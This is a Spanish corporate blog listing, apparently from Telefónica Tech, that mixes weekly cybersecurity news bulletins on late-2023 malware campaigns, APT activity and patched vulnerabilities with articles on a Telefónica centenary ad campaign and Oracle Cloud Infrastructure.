Nuevas técnicas de inyección de procesos indetectables por las soluciones EDR Investigadores de seguridad de SafeBreach han descubierto 8 nuevas técnicas de inyección de procesos que aprovechan los grupos de hilos de Windows para desencadenar la ejecución de código malicioso como resultado de acciones legítimas. Estas variantes de inyección han sido apodadas con el nombre de Pool Party, funcionan en todos los procesos, sin limitaciones y no son detectadas por las principales soluciones de detección y respuesta (EDR). En sus pruebas, SafeBreach ha conseguido un 100% de éxito, ya que ninguno de los EDR fue capaz de detectar o prevenir los ataques de Pool Party. Más info APT Sandman utiliza KEYPLUG como puerta trasera Se ha descubierto que la APT Sandman está vinculada a actores de amenaza chinos y está utilizando la puerta trasera KEYPLUG, concretamente el clúster STORM-0866/Red Dev 40. Tanto PwC como Microsoft han destacado esta conexión durante la pasada edición del congreso de ciberseguridad LABScon 2023. Se ha descubierto que en los sistemas de las víctimas coexisten el malware LuaDream y la puerta trasera KEYPLUG. Además, Sandman y STORM-0866/Red Dev 40 realizan prácticas similares de control y gestión de infraestructuras, como pueden ser la elección de proveedores de alojamiento o el conjunto de reglas utilizadas para nombrar los dominios. La implementación de LuaDream y KEYPLUG sugiere prácticas de desarrollo muy parecidas y que ambos poseen funciones y diseños similares, sugiriendo así una funcionalidad equivalente. Mas info Lazarus despliega tres nuevos malwares en una nueva campaña Los investigadores de Cisco Talos han descubierto una nueva operación atribuida a la APT norcoreana Lazarus, a la que han denominado Operation Blacksmith. En esta campaña, la APT ha empleado tres nuevos malwares programados en D, de los cuales dos son troyanos de acceso remoto (RAT), a los que han nombrado NineRAT y DLRAT, mientras que el tercero se trataría de un descargador bajo el nombre de BottomLoader. De acuerdo con los investigadores la operación comenzó en marzo de 2023 y sus objetivos han sido principalmente los sectores industrial, agricultura y seguridad. Asimismo, durante la campaña Lazarus ha explotado la vulnerabilidad CVE-2021-44228 CVSS 10.0, conocida como Log4Shell, para desplegar los tres malwares. Hay que destacar que Log4Shell es un fallo que afecta a la biblioteca de Apache Foundation Log4j y permitiría a un atacante ejecutar código remoto. Mas info KV-botnet está siendo empleada por el actor amenaza Volt Typhoon Los investigadores de Black Lotus Team de Lumen Technologies han detectado y publicado un análisis de una nueva botnet a la que han denominado KV-botnet. Esta botnet, formada por small office/home office (SOHO) routers, es empleada por diferentes actores amenaza como red oculta de transferencia de datos. Los investigadores destacan que la actividad de KV-botnet, activa desde febrero de 2022, ha aumentado considerablemente desde agosto de 2023. Asimismo, existen dos clusters de actividad en la botnet, denominados KV y JDY. Mientras que el primero parece ser operado manualmente en ataques a entidades de alto valor añadido, el segundo realiza escaneos más amplios y resulta menos sofisticada técnicamente. Según Black Lotus Team esta botnet estaría siendo operada por el actor amenaza de origen chino Volt Typhoon, también conocido como Bronze Silhouette, y empleada en ataques contra empresas de telecomunicaciones y entidades gubernamentales estadounidenses, entre otros. Más info El malware NKAbuse utiliza blockchain para realizar DDoS Investigadores de seguridad de Kaspersky han informado del descubrimiento de un nuevo malware llamado NKAbuse, el cuál está basado en Go y es el primero que abusa de la tecnología NKN (New Kind of Network) para el intercambio de datos, lo que lo convierte en una amenaza sigilosa. NKAbuse ejecuta nodos de forma similar a la red Tor, lo que contribuye a tener más robustez, ser descentralizado y aumentar su capacidad de manejar volúmenes de datos significativamente altos. Además de las capacidades DDoS, NKAbuse también actúa como un RAT en los sistemas vulnerados, lo que permite a sus operadores llevar a cabo la ejecución de comandos, la exfiltración de datos y realizar capturas de pantalla. Más info 💬 Para recibir noticias y reflexiones de nuestros expertos en Ciberseguridad, suscríbete a CyberSecurityPulse, nuestro canal en Telegram: https://t.me/cybersecuritypulse
15 de diciembre de 2023
Así es la primera campaña que presenta Telefónica con motivo de su centenario
En los últimos cien años, la tecnología nos ha permitido comunicarnos a través de la forma más humana que tenemos: los besos. Telefónica recoge este sentimiento en la primera de las tres campañas que rendirán homenaje a su centenario, que se celebrará el próximo 19 de abril. La Agencia Creativa de la compañía ha trabajado en colaboración con &Rosàs en un concepto creativo que gira en torno a las emociones. La red y los dispositivos tecnológicos que han surgido a lo largo de la historia nos han permitido conectar con nuestros seres queridos en cualquier momento y desde cualquier lugar. ¿Te imaginas lo que podríamos conseguir en los próximos 100 años? 100 años presente en la vida de las personas La red de Telefónica ha almacenado conexiones de besos en todo el mundo desde 1924. En correos electrónicos, videollamadas, mensajes de texto... La tecnología nos ha permitido llegar más lejos y estar más cerca de nuestros familiares y amigos. Y esa es la historia que se refleja en el primer anuncio de la compañía con motivo de su centenario bajo la sintonía Moon River interpretada por Amaia Montero. El spot recorre la historia de Telefónica desde su nacimiento hasta la actualidad, mostrando cómo a través de su servicio y su capacidad de transformación ha conectado la vida de las personas. A lo largo de la narración se muestra la evolución de la tecnología con situaciones cotidianas y el uso de dispositivos tradicionales. Todos los aparatos que utilizan los protagonistas en las diversas escenas son elementos reales que se encuentran en el archivo de patrimonio tecnológico de la compañía. Hablamos de los teléfonos de pared, la cabina, el teléfono de cable, el fax o el teléfono de casa que nos acompañado desde los años veinte. Para transmitir esa realidad, el equipo de arte también recreó escenarios populares de nuestra historia con el más mínimo detalle como la sala de las chicas del cable. Los profesionales diseñaron el espacio desde cero para que el público conociera de primera mano cómo funcionaba este mecanismo de comunicación que tantas relaciones humanas posibilitó en la década de los cincuenta. La producción se llevó a cabo durante cinco días en Madrid, Castilla-La Mancha y Cantabria. La productora Primo también participó en el rodaje, una pieza que destaca en términos de sostenibilidad. Por ejemplo, para hacer un uso responsable de los recursos, en una de las escenas se utilizó agua no potable para generar un efecto de lluvia a una temperatura de 30 grados. Por un futuro lleno de besos La narración de la campaña #UnBeso refleja cómo la innovación tecnológica nos ha permitido estar cada vez más cerca de las personas que queremos. Hace años, para comunicarnos con nuestros seres queridos recurríamos a centralitas telefónicas o cabinas situadas en las calles. Actualmente, la ubicuidad que nos proporcionan los dispositivos digitales nos permite hacerlo en cualquier parte y en cualquier momento. Si en los últimos años la tecnología ha permitido conseguir todo lo que imaginamos, imaginémonos todo lo que seremos capaces de hacer en los próximos cien Desde Telefónica vemos el futuro con ilusión para continuar poniendo la tecnología al servicio de las personas en los próximos cien años. Imaginar nos ha permitido adelantarnos al futuro y ahora más que nunca es nuestro motor para seguir creciendo y hacer nuestro mundo más humano conectando nuestras vidas. AUTORA Ana Vázquez García Periodista * * * Telefónica Tech Medidas para reducir la brecha digital de género sin esperar 32 años 10 de mayo de 2023
15 de diciembre de 2023
Boletín de Ciberseguridad, 25 de noviembre - 1 de diciembre
Nueva variante del ransomware DJVU, Xaro Investigadores de Cybereason han descubierto una variante de ransomware conocida como Xaro DJVU, que se distribuye como software descifrado. DJVU es una variante del ransomware STOP, que normalmente se hace pasar por servicios y aplicaciones legítimas y se distribuye a través de un patrón de ataque en el que los atacantes implementan malware adicional, principalmente stealers. Finalmente, agregan la extensión .xaro a los archivos afectados, solicitando un rescate por un descifrador. En la última campaña observada por Cybereason, el ransomware se ha propagado como un archivo comprimido que se hace pasar por el software legítimo CutePDF, que realmente instala el malware PrivateLoader, el cual establece contacto con un servidor C2 e implementa múltiples familias de malware como RedLine Stealer, Vidar, Lumma Stealer, Amadey o SmokeLoader. El objetivo principal es la recopilación y exfiltración de información sensible para una doble extorsión Mas info Descubren múltiples vulnerabilidades críticas en dispositivos NAS de Zyxel Zyxel ha solucionado varias vulnerabilidades, entre ellas tres críticas que podrían permitir a un atacante no autenticado ejecutar comandos del sistema operativo en dispositivos de almacenamiento conectados a la red (NAS) vulnerables. Las vulnerabilidades han sido clasificadas como CVE-2023-35137, CVE-2023-35138, CVE-2023-37927, CVE-2023-27928, CVE-2023-4473 y CVE-2023-4474. Los actores de amenazas podrían explotar las vulnerabilidades anteriores para obtener acceso no autorizado, ejecutar algunos comandos del sistema operativo, obtener información confidencial del sistema o tomar el control completo de los dispositivos NAS de Zyxel afectados. Más info Extensión maliciosa en Chrome que apunta a usuarios en Latinoamérica Investigadores de Trend Micro descubrieron una extensión maliciosa de Google Chrome llamada ParaSiteSnatcher, la cual utiliza un marco modular con componentes altamente ofuscados para aprovechar la API de Chrome y realizar acciones maliciosas. Según se indica, la extensión está diseñada para atacar a usuarios en Latinoamérica, especialmente en Brasil, extrayendo información confidencial relacionada con bancos y servicios de pago. La extensión se descarga a través de un descargador de VBScript, que posee tres variantes con niveles de ofuscación y complejidad distintos, y establece comunicación con un servidor C2 para recibir comandos y enviar datos robados. Una vez instalada, ParaSiteSnatcher manipula sesiones web, monitorea transacciones PIX, roba cookies, obtiene datos bancarios, intercepta solicitudes POST y realiza un seguimiento de las interacciones del usuario en múltiples pestañas. Asimismo, establece persistencia y manipula la interfaz de usuario del navegador. Trend Micro advierte además que la extensión también puede funcionar en navegadores basados en Chromium y posiblemente en Firefox y Safari, por lo que destacan la importancia de ser cauteloso al otorgar permisos a las extensiones de navegador. Más info General Electric y DARPA, víctimas de una brecha de seguridad General Electric (GE) y la Agencia de Proyectos de Investigación Avanzada de Defensa (DARPA) han sido víctimas de una fuga de seguridad recientemente. El actor amenaza que estaría detrás del ataque se denomina IntelBroker y ha publicado en un foro underground la venta de una base de datos de GE y DARPA, en la que se incluyen credenciales de acceso SSH y SVN, además de archivos militares y otros documentos de carácter sensible y confidencial. Según Rosa Smothers, ex analista de amenazas cibernéticas de la CIA, GE y DARPA habrían estado colaborando en iniciativas de investigación de vanguardia en los últimos años, las cuales podrían ubicarlas como objetivos de ciberataques. Actualmente se continúa investigando para conocer el impacto del ataque. Más info Vulnerabilidades críticas en ownCloud La solución de código abierto ownCloud dedicada a la compartición de archivos ha emitido un aviso de seguridad donde alerta sobre tres vulnerabilidades críticas. En concreto, el primero de los fallos es el registrado como CVE-2023-49103, CVSSv3 de 10, podría ser aprovechado por actores maliciosos para exponer las contraseñas de administrador y las credenciales del servidor de correo. En referencia a la segunda de las vulnerabilidades, CVSSv3 de 9.8, su explotación podría permitir acceder, modificar o eliminar cualquier archivo sin autenticación si se conoce el nombre de usuario, siempre y cuando no tuviera una clave de firma configurada. En cuanto al último error de seguridad, clasificado con un CVSSv3 de 9.0, un atacante puede remitir una URL de redireccionamiento especialmente diseñada para omitir el código de validación. Debido a la criticidad de las vulnerabilidades se recomienda aplicar inmediatamente las correspondientes actualizaciones. Más info 💬 Para recibir noticias y reflexiones de nuestros expertos en Ciberseguridad, suscríbete a CyberSecurityPulse, nuestro canal en Telegram: https://t.me/cybersecuritypulse
1 de diciembre de 2023
.jpg)
Boletín de Ciberseguridad, 18 - 24 de noviembre
El grupo de ransomware 8Base utiliza una variante de Phobos Cisco Talos ha detectado un aumento en la actividad de los ciberdelincuentes que utilizan el malware Phobos y el troyano SmokeLoader para distribuirlo. Descubrieron que el grupo 8Base utiliza Phobos en sus campañas y lo oculta en cargas útiles cifradas dentro de SmokeLoader, las cuales se descifran y cargan en la memoria del proceso. 8Base ha estado activo desde marzo de 2022 y se ha observado que una muestra de Phobos utiliza la extensión ".8base" para los archivos cifrados, lo que sugiere que 8Base puede ser un sucesor de Phobos o que está utilizando ransomware existente en sus ataques. Por otro lado, Cisco Talos ha descubierto que Phobos utiliza SmokeLoader para establecer persistencia, eliminar copias de seguridad y cifrar archivos. Además, el malware utiliza claves cifradas para proteger las funciones adicionales, permitiendo descifrar los archivos bloqueados. Phobos es una variante del ransomware Dharma, que se gestiona de manera centralizada y se vende como un servicio a otros ciberdelincuentes. Más info Kinsing explota vulnerabilidad en Apache ActiveMQ para atacar sistemas Linux Investigadores de TrendMicro recientemente descubrieron que el malware Kinsing, también conocido como h2miner, está aprovechando la vulnerabilidad critica CVE-2023-46604, CVSS 9.8, en Apache ActiveMQ para comprometer sistemas Linux mediante la ejecución remota de código. A pesar de que la falla fue parcheada en octubre, muchos servidores siguen siendo vulnerables lo que permite ejecutar comandos shell arbitrarios. Kinsing, conocido principalmente por dirigirse a sistemas Linux, utiliza exploits públicos para descargar y ejecutar malware, especialmente mineros de criptomonedas, mediante el método ProcessBuilder, que le permite ejecutar scripts bash maliciosos y descargar cargas útiles adicionales en el dispositivo infectado desde procesos a nivel de sistema, lo que le otorga flexibilidad y evita la detección. De igual manera, antes de implementar el minero, Kinsing elimina competidores, y establece persistencia a través de un cronjob que recupera la última versión de su script de infección y agrega un rootkit. Debido a que la vulnerabilidad está siendo activamente explotada, la recomendación es que se actualice Apache Active MQ a las versiones específicas para mitigar la amenaza. Más info Citrix pide cerrar todas las sesiones en NetScaler para evitar un ataque por Citrix Bleed Citrix ha publicado una nota en la que informa a los administradores de sistemas que para estar protegidos de la vulnerabilidad CVE-2023-4966, conocida como Citrix Bleed, además de aplicar el parche publicado en octubre deben borrar todas las sesiones de usuario anteriores y finalizar todas las activas, ya que actores de amenazas han estado robando tokens de autenticación, lo que les permite acceder a dispositivos comprometidos incluso después de haber sido parcheados. A propósito de la explotación, CISA y el FBI han emitido una nota conjunta en la que advierten de la explotación activa de esta vulnerabilidad por parte del grupo de ransomware LockBit. Más info La autenticación de Windows Hello en portátiles puede ser eludida La autenticación por medio de huella dactilar en portátiles Dell, Lenovo y Microsoft puede ser omitida al atacar el chip del sensor de huellas. Los investigadores de Blackwing Intelligence junto con Microsoft’s Offensive Research and Security Engineering (MORSE) explican cómo, al conectar el portátil a un dispositivo de hacking por USB o a una plataforma diseñada para tal efecto, pudieron llevar a cabo un ataque man-in-the-middle y evitar la autenticación de Windows Hello. En el caso de los modelos Lenovo ThinkPad T14s y Dell Inspiron 15 se suplantó el ID legítimo por la huella de un atacante, mientras que en Microsoft Surface Pro X se conectó un dispositivo que indica al sistema que el usuario del atacante está autorizado. Blackwing recomienda a los fabricantes activar el Secure Device Connection Protocol (SDCP), ya que descubrieron que en dos de los tres portátiles este canal seguro entre el host y los dispositivos biométricos estaba desactivado. Más info 💬 Para recibir noticias y reflexiones de nuestros expertos en Ciberseguridad, suscríbete a CyberSecurityPulse, nuestro canal en Telegram: https://t.me/cybersecuritypulse Imagen de Freepik.
24 de noviembre de 2023
Boletín de Ciberseguridad, 11 - 17 de noviembre
Patch Tuesday de noviembre de Microsoft Microsoft ha publicado las actualizaciones del Patch Tuesday del mes de noviembre en las que se parchean un total de 63 vulnerabilidades. Entre los fallos parcheados se encuentran cinco 0-day, de los cuales tres están siendo activamente explotados. En concreto, estas vulnerabilidades son las registradas como CVE-2023-36025, CVSS 8.8 según fabricante, la cual se trata de una falla de Windows SmartScreen explotada activamente que permite que un acceso directo a internet malicioso eluda los controles y advertencias de seguridad. Asimismo, el error CVE-2023-36033, CVSS 7.8 según fabricante, podría permitir la elevación de privilegios en la biblioteca principal DWM de Windows. Y, en último lugar, CVE-2023-36036, CVSS 7.8 según fabricante, que al igual que en el caso anterior su aprovechamiento podría desencadenar en una elevación de privilegios en archivos en la nube de Windows. En último lugar, cabe indicar que entre todas las vulnerabilidades únicamente una ha sido considerada como crítica CVE-2023-36397, CVSS 9.8, la cual consiste en aprovechar esta vulnerabilidad en Windows Pragmatic General Multicast (PGM) enviando un archivo especialmente diseñado a través de la red, lo que podría permitir ejecutar código malicioso remoto. Más info Nueva vulnerabilidad crítica no parcheada en VMware VMware ha publicado un advisory en el que informa de una vulnerabilidad crítica no parcheada que afecta a las implementaciones de dispositivos Cloud Director. El fallo, que ha sido denominado CVE-2023-34060, es de tipo bypass de autenticación y puede ser explotada por atacantes remotos no autenticados mediante ataques poco complejos que no requieren interacción con el usuario. La empresa destaca que la vulnerabilidad solo afecta a los dispositivos que usen la versión de VCD Appliance 10.5 y que hayan sido actualizados desde una versión anterior, por lo que no se verán afectados aquellos dispositivos que hayan instalado recientemente VCD Appliance 10.5 o sean implementaciones Linux. Finalmente, aunque no se ha publicado un parche para este fallo, VMware sí ha proporcionado a los usuarios una mitigación que implica la descarga de un script personalizado como medida paliativa. Más info CISA advierte sobre ataques de ransomware Rhysida El CISA, el FBI y el MS-ISAC han emitido una advertencia conjunta sobre los ataques del ransomware Rhysida, que ha afectado a diversas organizaciones desde su aparición en mayo de 2023. En concreto, las víctimas se aglutinan en sectores como educación, salud, manufactura, tecnología y gobierno, operando bajo el modelo de ransomware-as-a-service (RaaS). El aviso destaca que los actores amenaza comprometen a las organizaciones víctimas mediante ataques de phishing, explotando la vulnerabilidad conocida como Zerologon, CVE-2020-1472 CVSS 10.0, y vulnerando servicios remotos, como VPN, a través de la utilización de credenciales robadas, especialmente en entornos sin autenticación multifactorial habilitada; y así establecer el acceso inicial y mantener presencia dentro de las redes de las víctimas. Asimismo, también se advierte acerca de que afiliados del grupo Vice Society ahora están implementando cargas útiles de Rhysida. Finalmente, se insta a las organizaciones a aplicar las medidas de mitigación descritas en el aviso de seguridad, incluyendo la corrección de vulnerabilidades, la activación de MFA y la segmentación de red para prevenir movimientos laterales. De igual manera, se proporcionan indicadores de compromiso, información de detección y TTP descubiertos durante las investigaciones. Más info Effluence: puerta trasera utilizada contra activos de Atlassian Confluence El equipo de investigadores de Aon ha identificado una puerta trasera utilizada por actores maliciosos denominada Effluence que se implementa al explotar una vulnerabilidad en Atlassian Confluence. En concreto, el fallo de seguridad que se aprovecha para distribuir este software malicioso es el registrado como CVE-2023-22515, CVSSv3 de 9.8, el cual se trata de un error crítico en Atlassian que podría aprovecharse para crear cuentas de administrador de Confluence no autorizadas y acceder a servidores de Confluence. En caso de ser aprovechada la vulnerabilidad, Effluence genera persistencia y no se soluciona aplicando parches de seguridad, posibilitando a actores maliciosos la capacidad de realizar movimientos laterales en la red, además de poder filtrar datos de Confluence. Es importante destacar que los atacantes pueden acceder a la puerta trasera de forma remota sin autenticarse en Confluence. En último lugar, cabe indicar que, en base a estos hechos, Atlassian ha revelado una segunda vulnerabilidad crítica, registrada como CVE-2023-22518, CVSSv3 de 9.8, que puede ser aprovechada, concatenada con la anterior, para configurar una cuenta de administrador, resultando en la pérdida de confidencialidad, integridad y disponibilidad de los datos. Más info CISA advierte sobre el actor amenaza Scattered Spider La CISA y el FBI han emitido un aviso conjunto acerca del grupo Scattered Spider, también conocido como Starfraud, UNC3944, Scatter Swine, y Muddled Libra, que colaboran con la operación de ransomware BlackCat/ALPHV. Según se indica, contrariamente a la percepción de ser una banda cohesionada, Scattered Spider es una red de individuos, lo cual complica su seguimiento. La banda utiliza tácticas de ingeniería social, phishing y ataques de fatiga MFA para obtener acceso inicial a redes corporativas de las víctimas. Después de infiltrarse, emplean diversas herramientas de software público para reconocimiento y movimiento lateral. Además, realizan ataques de phishing para instalar malware como WarZone RAT y Raccoon Stealer. Asimismo, recientemente han adoptado la exfiltración de datos y el cifrado de archivos con el ransomware BlackCat/ALPHV, aplicando la doble extorsión. Scattered Spider muestra especial interés en activos valiosos como repositorios de código y certificados de firma; y también monitorean de cerca los canales de comunicación de las víctimas. El aviso de la CISA incluye una serie de recomendaciones específicas a implementar contra esta amenaza, y recomiendan además validar controles de seguridad con las técnicas del MITRE descritas en el mismo. Más info 💬 Para recibir noticias y reflexiones de nuestros expertos en Ciberseguridad, suscríbete a CyberSecurityPulse, nuestro canal en Telegram: https://t.me/cybersecuritypulse
17 de noviembre de 2023
Boletín de Ciberseguridad, 3 - 10 de noviembre
El grupo de ransomware Cl0p aprovecha una vulnerabilidad 0-day en SysAid El equipo de investigadores de Microsoft ha publicado los resultados de una investigación en la que señalan que operadores del ransomware Cl0p, famoso por la explotación masiva de un 0-day en MoveIT Transfer, estarían explotando una vulnerabilidad 0-day en SysAid, solución integral de gestión de servicios de IT. En concreto, el fallo de seguridad al que hacen referencia es el registrado como CVE-2023-47246 y cuyo aprovechamiento podría derivar en la ejecución de código no autorizado. En base a estos hechos, el proveedor publicó una entrada en su blog sobre un análisis técnico acerca de esta vulnerabilidad, señalando que su aprovechamiento fue mediante la carga de un archivo WAR que contenía un Webshell en la raíz del servicio web SysAid Tomcat, permitiendo a actores amenaza ejecutar scripts de PowerShell y cargar malware en los equipos vulnerables. En último lugar, cabe indicar que desde SysAid han explicado las recomendaciones a tomar por parte de los usuarios mediante la actualización a la versión 23.3.36 o posteriores para evitar la explotación del fallo de seguridad. Más info Descubiertas cuatro vulnerabilidades 0-day en Microsoft Exchange Trend Micro, a través de su programa Zero Day Initiative (ZDI), ha publicado acerca de cuatro vulnerabilidades 0-day que afectan a Microsoft Exchange, y que permiten a los actores amenaza ejecutar código remoto y robar información. La primera de las vulnerabilidades, ZDI-23-1578, se trata de un RCE que permite a atacantes remotos ejecutar código arbitrario en instalaciones afectadas. Los otros tres fallos de seguridad, identificados como ZDI-23-1579, ZDI-23-1580 y ZDI-23-1581, consisten en una validación incorrecta de Identificador de Recursos Uniforme (URI) que podría exponer información y permitiría a los actores amenaza acceder a datos confidenciales. Todos estos fallos de seguridad requieren autenticación para su explotación, lo que reduce su clasificación CVSS entre 7,1 y 7,5. Sin embargo, a pesar de requerir autenticación, los atacantes podrían obtener credenciales de Exchange; por lo que se recomienda la autenticación multifactorial y restringir la interacción con las aplicaciones de Exchange como medidas de mitigación. Por otro lado, según informa el medio digital BleepingComputer, ZDI descubrió y notificó a Microsoft acerca de estas vulnerabilidades en septiembre de 2023. Sin embargo, a pesar de que Microsoft reconoció los errores, no priorizó las correcciones de forma inmediata, alegando que algunas ya se han solucionado o que no cumplen con los requisitos para el servicio inmediato según sus políticas internas. Más info BlueNoroff apunta contra sistemas macOS con el nuevo malware ObjCShellz El equipo de investigadores de Jamf Threat Labs ha publicado los resultados de una investigación en la que señalan que el actor amenaza norcoreano BlueNoroff estaría apuntando contra sistemas macOS con su nuevo malware ObjCShellz. Según los expertos, este agente malicioso es conocido por realizar ataques contra entidades financieras y exchanges de criptomonedas, por lo que su finalidad es el lucro económico. En esta ocasión, desde Jamf advierten que estarían empleado un nuevo malware basado en Objective-C que dispone de características diferentes a otros software maliciosos utilizados por este actor. No obstante, destaca por ser utilizado en etapas posteriores a la explotación para ejecutar comandos y permite abrir shells de forma remota en los equipos infectados. En último lugar, cabe indicar que, aunque es bastante simple, ObjCShellz es muy funcional para las operaciones llevadas a cabo por BlueNoroff. Más info Vulnerabilidad crítica en Atlassian Confluence explotada en ataques de ransomware Recientemente se observó que actores amenaza están aprovechando el error crítico de omisión de autenticación en Atlassian Confluence, conocido como CVE-2023-22518, para cifrar archivos y desplegar ransomware. Atlassian emitió una actualización de su aviso de seguridad en la que reestableció el CVSS de 9.1 a 10.0, debido a estos cambios en el alcance del ataque y recordando que la vulnerabilidad afecta a todas las versiones de su software Confluence Data Center and Server. Cabe destacar que la empresa emitió el pasado 31 de octubre las respectivas actualizaciones de seguridad y exhortó a los administradores a parchear de inmediato las instancias vulnerables, advirtiendo que la falla también podría borrar datos. Además, fue emitida una segunda advertencia dos días después de publicar el parche, sobre una prueba de concepto disponible en línea de la cual no se tenía evidencia de explotación en curso. Sin embargo, días después se informó que actores amenaza ya estaban explotando la falla en ataques. Dicha explotación generalizada se detectó a partir del pasado 5 de noviembre en ataques contra organizaciones en los EE. UU., Taiwán, Ucrania, Georgia, Letonia y Moldavia, desde tres direcciones IP diferentes según informó Andrew Morris, director ejecutivo de la empresa de inteligencia de amenazas GreyNoise. Más info Expuestos los datos de Dolly pese a haber pagado el rescate exigido Según afirma Cybernews, la empresa de mudanzas Dolly aceptó pagar el rescate exigido por el grupo de ransomware que había accedido a sus sistemas para que los criminales no publicaran los datos exfiltrados pero estos los publicaron igualmente ya que consideraron que la cantidad pagada por Dolly no era suficiente. Cybernews agrega que el actor de la amenaza publicó en la dark web la conversación mantenida con Dolly en la que éste accedía al pago de la cantidad reclamada. Más info 💬 Para recibir noticias y reflexiones de nuestros expertos en Ciberseguridad, suscríbete a CyberSecurityPulse, nuestro canal en Telegram: https://t.me/cybersecuritypulse Cyber Security AI of Things La CIA publica un informe sobre deepfakes y cómo manejar esta amenaza 18 de octubre de 2023
10 de noviembre de 2023
Conoce Oracle Cloud Infrastructure (OCI), la plataforma Cloud de nueva generación
Recientemente hemos celebrado una jornada de formación con nuestro partner Oracle en sus oficinas de Madrid, donde tuvimos ocasión de ampliar el conocimiento y capacitación de nuestros equipos especializados en OCI, Oracle Cloud Infrastructure, y de profundizar en nuestra propuesta de valor conjunta en Cloud de nueva generación. Oracle Day, octubre 2023 Qué es Oracle Cloud Infrastructure (OCI) OCI (Oracle Cloud Infrastructure) es la plataforma Cloud de nueva generación de nuestro partner Oracle que utiliza tecnologías como contenedores, microservicios y automatización para ofrecer un rendimiento y escalabilidad superiores. Proporciona una amplia gama de servicios de computación en la nube, almacenamiento, redes y seguridad para empresas de todos los tamaños y sectores, además de una amplia gama de servicios especializados, como bases de datos, análisis de datos, Inteligencia Artificial y aprendizaje automático, Blockchain y servicios de Internet de las Cosas (IoT, Internet of Things). Beneficios de OCI para las empresas Soberanía: ofrece la capacidad de tener control total sobre los datos y aplicaciones en la nube. Las empresas pueden elegir la ubicación geográfica de sus datos y asegurarse de que cumplen con la normativa y regulaciones locales. Latencia baja: cuenta con una red global de centros de datos interconectados, lo que permite una baja latencia en la transferencia de datos. Esto es beneficioso para aplicaciones que requieren respuesta rápida, como aplicaciones en tiempo real o transacciones financieras. Escalabilidad y flexibilidad: permite a las empresas escalar sus recursos de manera rápida y eficiente según sus necesidades. Pueden aumentar o disminuir la capacidad de procesamiento, almacenamiento y redes de forma dinámica, lo que les permite adaptarse a cambios en la demanda o en el crecimiento del negocio. Seguridad: ofrece una amplia gama de servicios de seguridad para proteger los datos y las aplicaciones en la nube. Esto incluye cifrado de datos, control de acceso, detección de amenazas y protección contra ataques DDoS, entre otros. Integración con tecnologías existentes: se integra fácilmente con las tecnologías y herramientas existentes en las empresas. Esto facilita la migración de aplicaciones y datos a la nube sin interrupciones y permite a las empresas aprovechar sus inversiones anteriores. Soluciones Cloud escalables, flexibles y seguras Cualquier empresa puede aprovechar sus servicios y beneficiarse de utilizar OCI. Desde startups hasta grandes empresas, OCI ofrece soluciones escalables y flexibles para satisfacer las necesidades de diferentes industrias y tamaños de negocio. Además, OCI es especialmente atractivo para empresas que requieren un alto rendimiento, baja latencia y control sobre sus datos, como empresas de servicios financieros, telecomunicaciones, salud y gobierno, además de empresas de comercio electrónico, medios y entretenimiento, manufactura, educación y muchas otras industrias que requieren una infraestructura en la nube confiable y escalable. Cloud Los 6 errores más comunes a la hora de presupuestar un proyecto Cloud 19 de octubre de 2023 Oracle Cloud Infrastructure en el porfolio de Telefónica Tech En 2022 llegamos a un acuerdo entre Oracle y Telefónica Tech global que nos permitió ampliar nuestros servicios en la nube y reforzar nuestro posicionamiento estratégico en PaaS con la inclusión de Oracle Cloud Infrastructure (OCI) en el creciente porfolio de Telefónica Tech. Imagen: Oracle Se trata de la primera región de Oracle en España, y es un indicativo de nuestro “compromiso por proporcionar a nuestros clientes las soluciones más avanzadas”, señalaba recientemente la firma de análisis de mercado Omdia. ☁️ PaaS (Plataforma como servicio) es una oferta de servicios en la nube que facilita a los desarrolladores y usuarios de negocios la creación de aplicaciones con mayor rapidez que las soluciones locales. Servicios Cloud con baja latencia y alta seguridad En ese sentido, Oracle confía en Telefónica Tech para alojar la región de Madrid en nuestros data centers, así como la región soberana proporcionando a clientes españoles servicios en la nube con baja latencia y alta seguridad. Esta colaboración también cumple con los requisitos de residencia de datos y cumplimiento normativo en España. El despliegue de la región en nuestras infraestructuras nos ha permitido proporcionar a nuestros clientes B2B todas las ventajas de la tecnología de Oracle sobre una arquitectura propia, gestionada por ambas compañías. Lo que se traduce para nuestros clientes en: Reducción de tiempos de entrega, es decir, agilidad en la incorporación de la innovación. Mejora en el análisis y explotación de datos facilitando el uso y el acceso a los mismos. Refuerzo de la seguridad y fiabilidad protegiendo infraestructura y datos. Con esta alianza, además de comercializar los servicios de OCI en Telefónica Tech proporcionamos acompañamiento en la migración, despliegue y gestión con altas capacidades en servicios profesionales y gestionados. Caso de éxito: Grupo Editorial Joly El caso de éxito de Grupo Editorial Joly es un ejemplo de cómo en Telefónica Tech hemos sido un socio clave en la transformación digital del cliente mediante la migración a la nube de Oracle, utilizando los servicios de OCI (Oracle Cloud Infrastructure). Grupo Editorial Joly es una empresa de medios de comunicación con sede en España. En su proceso de transformación digital, buscaban una solución en la nube que les permitiera mejorar la eficiencia, el análisis de datos y la seguridad de su infraestructura y datos. Desde Telefónica Tech, en colaboración con OCI, proporcionamos a Grupo Editorial Joly servicios de almacenamiento, procesamiento, seguridad y bases de datos en la nube. Además de servicios profesionales asociados para el despliegue y puesta en marcha de la solución. ✅ La migración a OCI permitió a Grupo Editorial Joly reducir los tiempos de entrega, agilizar la incorporación de la innovación, mejorar el análisis y explotación de datos, y reforzar la seguridad y fiabilidad de su infraestructura y datos. Este caso de éxito demuestra cómo OCI y Telefónica Tech hemos ayudado a una empresa de medios de comunicación a aprovechar los beneficios de la nube para impulsar su transformación digital y mejorar su eficiencia y seguridad. AUTORES IGNACIO GARCÍA HERRÁEZ Strategic Partners Development Expert — ANTONIO LÓPEZ GONZÁLEZ Global Product Manager * * * Cloud La importancia de FinOps en la gestión y optimización de los costes en la nube 19 de noviembre de 2024
9 de noviembre de 2023
.jpg)
Boletín de Ciberseguridad, 28 de octubre - 3 de noviembre
